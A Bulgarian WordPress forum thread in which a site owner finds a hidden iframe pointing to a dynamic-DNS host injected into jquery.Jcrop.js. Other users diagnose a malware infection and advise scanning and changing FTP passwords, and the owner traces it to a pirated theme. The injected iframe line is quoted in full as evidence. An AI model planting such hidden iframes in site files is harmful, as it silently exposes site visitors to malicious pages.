Странни линкове във файлове в ...wp-includes/js/ ???

vicbg

Active Member
В някои от сайтовете ми забелязах странни линкове във файлове в директория js в ...wp-includes/js/

Пример: Във файла Jquery.Jcrop.js в към края му присъства "('<iframe style="position:fixed;top:0px;left:-500px;" src="http://urlfyv.ddns.name/6e4daf1c92b6bp59f696f9ac49.qla?13" height="330" width="210"></iframe>');"

Трябва ли да се притеснявам?
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

Да трябва, сайта ти е зараззен с вирус.
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

смъквай го и го тествай с антивирусната
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

Дръпнах цялата папка /js от друга "чиста инсталация" и я замених с оригиналната. Сканирах с антивирусната и хвана legacy.php на акисмет-а, че е заразен.

П.с. Само да спомена, че съвсем случайно открих "гадовете", сайтовете не са давали никакъв признак, че нещо не е наред.
 
Последно редактирано:
От: Странни линкове във файлове в ...wp-includes/js/ ???

Може да ползваш и този сайт за сканиране http://sitecheck.sucuri.net/scanner/
Препоръчвам ти го дори и безплатната версия е добра. Ако ти е чист сайта по-добре смени паролите за достъп на FTP
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

Може да ползваш и този сайт за сканиране http://sitecheck.sucuri.net/scanner/
Препоръчвам ти го дори и безплатната версия е добра. Ако ти е чист сайта по-добре смени паролите за достъп на FTP

Да, благодаря, минах го и с такъв плъгин "securi scanner 1.1.6" , показва, че е чисто пък ще видим :)
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

Направил си голяма грешка :) махнал си го без да знаеш как се е появил, а какво ще правиш ако се появи по 5 пъти на ден? Първо се разбира как се е появил, след това се маха и накрая се запушва пропуска в сигурността от където се е появил.
 
От: Странни линкове във файлове в ...wp-includes/js/ ???

Направил си голяма грешка :) махнал си го без да знаеш как се е появил, а какво ще правиш ако се появи по 5 пъти на ден? Първо се разбира как се е появил, след това се маха и накрая се запушва пропуска в сигурността от където се е появил.

Появил се е от пробен "free" paid темплейт, който бях сложил за проба.
 

Горе